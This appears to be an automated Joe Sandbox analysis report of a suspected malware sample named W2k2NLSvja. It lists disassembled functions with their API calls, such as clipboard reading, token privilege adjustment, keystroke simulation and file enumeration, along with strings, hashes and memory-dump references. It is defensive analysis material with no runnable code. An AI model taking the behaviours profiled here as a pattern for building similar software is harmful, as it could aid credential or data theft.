                                                                                                                        • Opcode ID: ca3e0c294b1dbcee10d1b1761b1af77b9c532dcbdbc0f94e315f707675f749c6
                                                                                                                        • Instruction ID: a576d4e555d59e6746d056de040d6d1acf73edfae4c8418f333e68eef7abdbab
                                                                                                                        • Opcode Fuzzy Hash: ca3e0c294b1dbcee10d1b1761b1af77b9c532dcbdbc0f94e315f707675f749c6
                                                                                                                        • Instruction Fuzzy Hash: E3D0C77464020CBFE710DB80DC46FA9777CD705710F100194FD0456290D6B27D509795
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wfsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 197181222-0
                                                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                        • Instruction ID: ebfbeaa45d6c53008cc8c6724e5fcb56196db5339e83fc68bcc3526924edbd8c
                                                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                        • Instruction Fuzzy Hash: 97B092B684020C7BDE012E82EC02A593F199B45A78F808020FF0C18162A677A6A0A689
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000002,00000000), ref: 00FED46A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452528299-0
                                                                                                                        • Opcode ID: 69204334f63b1302ba4ac858e9c1741db649ffc23099c0d9c308da53eeeb7e27
                                                                                                                        • Instruction ID: dab34a4da0d5ba797cddd39aa8ca31bacd048fb208d141472c9821482e93002a
                                                                                                                        • Opcode Fuzzy Hash: 69204334f63b1302ba4ac858e9c1741db649ffc23099c0d9c308da53eeeb7e27
                                                                                                                        • Instruction Fuzzy Hash: 807195346083418FC714FF25C8D1AAEB7E0AF94714F18452DF8969B6A1DB38ED09EB52
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction ID: e611eff1314af85b4240898ce8d27586fcf18a8003839dd700fc32160564fffe
                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction Fuzzy Hash: 2131E5B1A00106DFCB18DF58E4C0A69F7A6FF5A310B648AA5E409DB651DB31EDC1EBD0
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00F522B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036404083.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f50000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction ID: 5f777c8e874bdc59fdd1d3645e0cda82911e4837e4a3b70b43b1cf8a82cfd9d0
                                                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction Fuzzy Hash: 88E0BF7594010EEFDB00EFA8D5496DE7BB4EF04312F1006A1FD05E7680DB309E549A62
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00F522B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036404083.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f50000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction ID: 27750e97668d80b6ad7619c521b2bb337fc586df55405d1d3c2b9e92120aa84a
                                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction Fuzzy Hash: 28E0E67594010EEFDB00EFB8D54969E7FB4EF04302F100261FD05E2280D6309D509A72
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0100CE50
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0100CE91
                                                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0100CED6
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0100CF00
                                                                                                                        • SendMessageW.USER32 ref: 0100CF29
                                                                                                                        • _wcsncpy.LIBCMT ref: 0100CFA1
                                                                                                                        • GetKeyState.USER32(00000011), ref: 0100CFC2
                                                                                                                        • GetKeyState.USER32(00000009), ref: 0100CFCF
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0100CFE5
                                                                                                                        • GetKeyState.USER32(00000010), ref: 0100CFEF
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0100D018
                                                                                                                        • SendMessageW.USER32 ref: 0100D03F
                                                                                                                        • SendMessageW.USER32(?,00001030,?,0100B602), ref: 0100D145
                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0100D15B
                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0100D16E
                                                                                                                        • SetCapture.USER32(?), ref: 0100D177
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0100D1DC
                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0100D1E9
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0100D203
                                                                                                                        • ReleaseCapture.USER32 ref: 0100D20E
                                                                                                                        • GetCursorPos.USER32(?), ref: 0100D248
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0100D255
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0100D2B1
                                                                                                                        • SendMessageW.USER32 ref: 0100D2DF
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0100D31C
                                                                                                                        • SendMessageW.USER32 ref: 0100D34B
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0100D36C
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0100D37B
                                                                                                                        • GetCursorPos.USER32(?), ref: 0100D39B
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0100D3A8
                                                                                                                        • GetParent.USER32(?), ref: 0100D3C8
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0100D431
                                                                                                                        • SendMessageW.USER32 ref: 0100D462
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0100D4C0
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0100D4F0
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0100D51A
                                                                                                                        • SendMessageW.USER32 ref: 0100D53D
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0100D58F
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0100D5C3
                                                                                                                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0100D65F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                        • API String ID: 3977979337-4164748364
                                                                                                                        • Opcode ID: 200ffe0f1d20ab7d4c21d3ab3bda539362a8b7fb187e5cfbd4cf0fca30027edd
                                                                                                                        • Instruction ID: 469fc233466ac0c470cf787410d52d016b7f94514153e26adf2da5f91509a744
                                                                                                                        • Opcode Fuzzy Hash: 200ffe0f1d20ab7d4c21d3ab3bda539362a8b7fb187e5cfbd4cf0fca30027edd
                                                                                                                        • Instruction Fuzzy Hash: 5142BC74104341AFF726CF68C984AAABBE5FF49314F04069DF6D5872E1DB36A840DB92
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0100873F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                        • Opcode ID: bc96691fe22e9801d53262c828c1577028bac7a7937d34742f7b95c127f02035
                                                                                                                        • Instruction ID: 72dc04f3cffa804e69c9c0bf3350ec9e37cdcc82ca3754c19128af43c018c5d2
                                                                                                                        • Opcode Fuzzy Hash: bc96691fe22e9801d53262c828c1577028bac7a7937d34742f7b95c127f02035
                                                                                                                        • Instruction Fuzzy Hash: B112AC71900205ABFB768F28CC49FAE7BE8FB49350F10815AFA95EA2D5DB758941CB10
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$_memset
                                                                                                                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                        • API String ID: 1357608183-1798697756
                                                                                                                        • Opcode ID: 1f66ea29d5ee1fbb9f13755ccce0111ef9c30ddc689500791cf73a14a61141e5
                                                                                                                        • Instruction ID: aaa85599c164f69e089aceae5556f3f10c4bc23890ce7d3b3cae632ea245e6c1
                                                                                                                        • Opcode Fuzzy Hash: 1f66ea29d5ee1fbb9f13755ccce0111ef9c30ddc689500791cf73a14a61141e5
                                                                                                                        • Instruction Fuzzy Hash: 61938272E043159BDF24DF58C8817ADB7B2FF58320F29816AE955AB380E7709D81EB40
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(00000000,?), ref: 00F84A3D
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FBDA8E
                                                                                                                        • IsIconic.USER32(?), ref: 00FBDA97
                                                                                                                        • ShowWindow.USER32(?,00000009), ref: 00FBDAA4
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00FBDAAE
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FBDAC4
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00FBDACB
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBDAD7
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FBDAE8
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FBDAF0
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FBDAF8
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00FBDAFB
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDB10
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00FBDB1B
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDB25
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00FBDB2A
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDB33
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00FBDB38
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDB42
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00FBDB47
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00FBDB4A
                                                                                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 00FBDB71
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                        • Opcode ID: 5a732c7ad9f721ca5cd1066f8af8b209ad12b7c452bb1448f4e06e3ced408d0b
                                                                                                                        • Instruction ID: 4c30ec92ad373a8f038e2ff98850fe4171e2d97be53c1c6b28c5d2bb8a659a29
                                                                                                                        • Opcode Fuzzy Hash: 5a732c7ad9f721ca5cd1066f8af8b209ad12b7c452bb1448f4e06e3ced408d0b
                                                                                                                        • Instruction Fuzzy Hash: AD319371A40318BBEB316F629C49FBF7E6CEB44B61F114015FA04EA1C1DAB65900BFA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FD8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8D0D
                                                                                                                          • Part of subcall function 00FD8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8D3A
                                                                                                                          • Part of subcall function 00FD8CC3: GetLastError.KERNEL32 ref: 00FD8D47
                                                                                                                        • _memset.LIBCMT ref: 00FD889B
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FD88ED
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00FD88FE
                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FD8915
                                                                                                                        • GetProcessWindowStation.USER32 ref: 00FD892E
                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00FD8938
                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FD8952
                                                                                                                          • Part of subcall function 00FD8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FD8851), ref: 00FD8728
                                                                                                                          • Part of subcall function 00FD8713: CloseHandle.KERNEL32(?,?,00FD8851), ref: 00FD873A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                        • String ID: $default$winsta0
                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                        • Opcode ID: dcc2ee7e6cd2b47ed2f028cd8445ef357699f42484c956924277c04ff8492d19
                                                                                                                        • Instruction ID: 4972292308aba180a49ba19a9b009294a152f2e1a23973798c786722b7ae0f5d
                                                                                                                        • Opcode Fuzzy Hash: dcc2ee7e6cd2b47ed2f028cd8445ef357699f42484c956924277c04ff8492d19
                                                                                                                        • Instruction Fuzzy Hash: 50816D71D00209BFDF21DFA4CC45AEE7B7AEF04394F08411AF910A6250DB798E16EB60
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(0100F910), ref: 00FF4284
                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00FF4292
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00FF429A
                                                                                                                        • CloseClipboard.USER32 ref: 00FF42A6
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00FF42C2
                                                                                                                        • CloseClipboard.USER32 ref: 00FF42CC
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF42E1
                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00FF42EE
                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00FF42F6
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00FF4303
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF4337
                                                                                                                        • CloseClipboard.USER32 ref: 00FF4447
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3222323430-0
                                                                                                                        • Opcode ID: 1c5547ee9ac797847947d9e9479a1514087ee11f3d312254d88cf0ee1e1a2a14
                                                                                                                        • Instruction ID: f2bd9ae27c4ef04af85928fa65ca6f3db0c4320e23ed80fe887d3553428d7fac
                                                                                                                        • Opcode Fuzzy Hash: 1c5547ee9ac797847947d9e9479a1514087ee11f3d312254d88cf0ee1e1a2a14
                                                                                                                        • Instruction Fuzzy Hash: D551D535204306ABD321FF60DC85F7F77A8AF84B10F100529FA95D21A5DF79E905AB62
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00FEC9F8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FECA4C
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FECA71
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FECA88
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FECAAF
                                                                                                                        • __swprintf.LIBCMT ref: 00FECAFB
                                                                                                                        • __swprintf.LIBCMT ref: 00FECB3E
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                        • __swprintf.LIBCMT ref: 00FECB92
                                                                                                                          • Part of subcall function 00FA38D8: __woutput_l.LIBCMT ref: 00FA3931
                                                                                                                        • __swprintf.LIBCMT ref: 00FECBE0
                                                                                                                          • Part of subcall function 00FA38D8: __flsbuf.LIBCMT ref: 00FA3953
                                                                                                                          • Part of subcall function 00FA38D8: __flsbuf.LIBCMT ref: 00FA396B
                                                                                                                        • __swprintf.LIBCMT ref: 00FECC2F
                                                                                                                        • __swprintf.LIBCMT ref: 00FECC7E
                                                                                                                        • __swprintf.LIBCMT ref: 00FECCCD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                        • API String ID: 3953360268-2428617273
                                                                                                                        • Opcode ID: bcf208531519872e1e9a96283aeba97945bb2d0aae910b048d4cf818e3745c11
                                                                                                                        • Instruction ID: bbafa46f359fb16e1af35012fda50ea6e13578ad163ecafc10237ef93039bd23
                                                                                                                        • Opcode Fuzzy Hash: bcf208531519872e1e9a96283aeba97945bb2d0aae910b048d4cf818e3745c11
                                                                                                                        • Instruction Fuzzy Hash: FBA14DB2508305ABC714FB65CC85DAFB7ECAF94B00F440919B586C3191EB78DA09DB62
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00FEF221
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF236
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF24D
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00FEF25F
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00FEF279
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00FEF291
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FEF29C
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00FEF2B8
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF2DF
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF2F6
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEF308
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(0103A5A0), ref: 00FEF326
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FEF330
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FEF33D
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FEF34F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
